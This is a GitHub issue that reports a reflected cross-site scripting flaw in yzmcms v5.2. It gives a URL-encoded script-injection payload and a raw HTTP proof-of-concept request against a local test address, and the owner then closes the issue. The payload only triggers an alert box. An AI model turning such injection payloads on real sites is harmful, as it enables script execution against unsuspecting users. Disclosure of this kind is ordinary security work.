New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

yzmcms v5.2 XSS #7

Closed
r0code opened this Issue Nov 7, 2018 · 2 comments

Comments

Projects
None yet
2 participants
@r0code

r0code commented Nov 7, 2018

http://192.168.1.40/search/index/archives/pubtime/1526387722/page/1.html
XSS payload: http://192.168.1.40/search/index/archives/pubtime/1526387722/page/1.html?tqh3l%22%3e%3cscript%3ealert(1)%3c%2fscript%3er6qt2=1

POC:
GET /search/index/archives/pubtime/1526387722/page/1.html?tqh3l%22%3e%3cscript%3ealert(1)%3c%2fscript%3er6qt2=1 HTTP/1.1
Host: 192.168.1.40
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.1.40/search/index/archives/pubtime/1526387722.html
Cookie: PHPSESSID=u0bh5qnr84qsu9aa0oj8vpkuk2

image

@yzmcms

This comment has been minimized.

Owner

yzmcms commented Nov 7, 2018

小兄弟,你好厉害

@yzmcms yzmcms closed this Nov 7, 2018

@r0code

This comment has been minimized.

r0code commented Nov 8, 2018

@yzmcms yzmcms reopened this Nov 8, 2018

@yzmcms yzmcms closed this Nov 8, 2018

Repository owner deleted a comment from r0code Nov 8, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment